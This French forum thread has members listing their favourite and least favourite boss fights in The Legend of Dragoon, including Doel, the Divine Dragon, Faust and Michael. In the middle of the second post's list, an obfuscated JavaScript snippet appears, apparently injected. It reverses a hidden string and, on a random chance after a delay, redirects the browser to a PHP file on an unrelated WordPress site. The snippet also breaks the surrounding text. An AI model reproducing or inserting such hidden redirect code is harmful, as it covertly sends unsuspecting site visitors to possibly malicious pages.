Combats préférés/détestés

Pour parler du jeu
Répondre
Avatar du membre
-Su-
Dragon aux Yeux Rouges
Dragon aux Yeux Rouges
Messages : 33
Enregistré le : 24 mai 2013, 18:06

Combats préférés/détestés

Message par -Su- »

Un sujet tout simple afin de parler des combats qui nous ont le plus marqué dans ce jeu, que l'on adore refaire ou au contraire que l'on aime pas du tout pour diverses raisons.

Voici les combats que j'aime le plus :

Les deux combats contre Fruegel. Comme je l'avais déjà dit, j'aime beaucoup le début de l'aventure, lorsque les personnages ne sont encore pas trop des surhommes et qu'on affronte d'autres soldats. Et Fruegel est tellement affreux que c'est un plaisir de lui percer sa grosse bedaine à coup d'épées. En plus, la première fois, quatre soldats d'Héléna combattent à ses côtés, et la seconde, ce sont ses deux animaux qui lui prêtent main forte. Les combats sont donc assez riches et diversifiés.

Drake. J'aime beaucoup le personnage, et la Chapelle Shirley en général. Le fait qu'il utilise ses bombes et ses fils sort le combat de l'ordinaire. Dommage par contre qu'il n'ait que trois attaques différentes.

Doel. J'aime quand les combats sont évolutifs. Doel est d'abord humain, puis se transforme, puis lance son bouclier, à moins d'avoir fait beaucoup de lvl up avant, ce combat est long et difficile. Et le personnage de Doel est très réussi je trouve, plein de mystères et de paradoxes, et ce jusqu'à la Lune.

Kamui. Un boss pas très costaud et plutôt simple, mais j'aime bien. Tant le scénario qu'il y a autour que son attaque spécial, lorsqu'il grimpe au sommet de son arbre et hurle vers le ciel.

Le Dragon Divin. Le combat grandiose par excellence. On sait depuis sa première apparition au-dessus de Deningrad qu'il va falloir l'affronter, alors quand on arrive enfin face à lui, on jubile. D'autant plus grâce à la cinématique avant le combat. Il est tout bonnement gigantesque, ses attaques magnifiques, et le dénouement du combat spectaculaire.

Vector, Selebus et Kubila. Je trouve ces trois ennemis très réussis. Ils ont chacun une allure et une personnalité propre et originale : le tortionnaire, la justicière, l'exécuteur. En plus de ça, leurs attaques sont variées et leurs actions se combinent. Selebus peut ainsi faire grandir Vector et soigner ses coéquipiers. Un combat vraiment sympa.

Imago. Là encore, c'est un combat évolutif. La chenille, le cocon, le papillon. La forme finale est vraiment magnifique.

Claire. J'adore le duel d'arts martiaux entre le père et sa fille, possédée par le Dieu de la Guerre. Et le dénouement est génial.

Endora. J'aime combattre avec Kongol, je trouve son combo final très impressionnant, même si il fait finalement moins de dégâts que ceux des autres. Normal donc que j'aime son défi. D'autant plus que ce combat peut être finit en un seul coup, si on lance Dimunition et Augmentation Puissance, et ainsi Endora n'a pas le temps de traiter son frère de faible avant d'être vaincu !

L'Archange. Méru qui tient tête sans flancher et ce jusqu'au bout à la divinité de son peuple, j'adore ! En plus, je trouve cet ennemi très réussi et son attaque spéciale, lorsqu'il appelle des tas de voliens sur son éléphant volant à trois têtes, fait incontestablement partie de mes favorites !

Melbu Frahma. Ca c'est un boss de fin ! Je me souviendrai toujours de la première fois où je l'ai affronté ! Il n'arrête pas de changer de forme, et le décor avec lui, et quand enfin on pense que c'est terminé, la sixième génération débute et on se retrouve dans un environnement post-apocalyptique terrible !

Maintenant les combats qui m'énervent à chaque fois que je refais une partie.

Lénus et Régole. L'attaque spécial de Régole fait sans doute partie des magies les plus longues qui soit. Donc oui la première fois elle est chouette, mais quand la bestiole te la refait trois ou quatre fois dans le combat, c'est lourd ! Lénus a elle aussi une magie qui dure assez longtemps en plus...

Faust. J'aime son allure, ses quatre serviteurs maléfiques autour de lui, et ses trois magies spéciales sont plutôt impressionnantes ( surtout la première, celle de feu ). Mais qu'est-ce qu'il peut être horripilant à combattre. Il contre-attaque dès qu'on le touche, et avec des magies durant à chaque fois un petit moment. Du coup, on attend toujours entre chaque action, le combat est sans arrêt coupé, c'est vraiment chiant.

Michael. Non mais franchement Rose... T'es obligée de nous faire attendre 15 tours avant de dire à Dart comment tuer ton dragon ? Défendre, défendre, défendre, défendre, voir Dart parler, se dire cool on va enfin pouvoir faire quelque chose, puis non, redéfendre, redéfendre, redéfendre, voir Dart reparler à Rose, et ba non toujours rien, et ainsi de suite jusqu'à ce qu'enfin on puisse attaquer... C'est vraiment long et ennuyeux ! C'est dommage parceque l'idée et le dragon sont cools...

Bon ça va, y a quand même plus de combats que j'adore que je déteste. D'autant plus que j'apprécie la plupart de ceux que je n'ai pas cités ici. Allez, voyons voir maintenant si vous avez des goûts différents des miens !
"Oeil de l'âme, éveille-toi !"
Avatar du membre
Septine Madrona
Dragon Noir
Dragon Noir
Messages : 256
Enregistré le : 23 nov. 2008, 19:34
Localisation : Libourne (33)
Contact :

Re: Combats préférés/détestés

Message par Septine Madrona »

Plus le temps passe et plus j'oublie certaines parties du jeu, y compris quelques combats. Donc ça va être dur de faire une liste précise.

Les combats que j'aime bien:
- Superbe Bijou
- Drake
- Les 4 anciens dragoons
- Doel
- Urobolus
- Rose de Mort

Les combats que je n'aime pas:
- Mappi et Gehrich
- Fruegel
- Django
- Greham et Feyrbr$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and

J'ai mis ceux que j'avais en tête, mais je suis sûre que j'en oublie plein! Et pour ceux dont j'avais un doute car je ne m'en souviens plus très bien, j'ai préféré ne pas les mettre.
Image
Répondre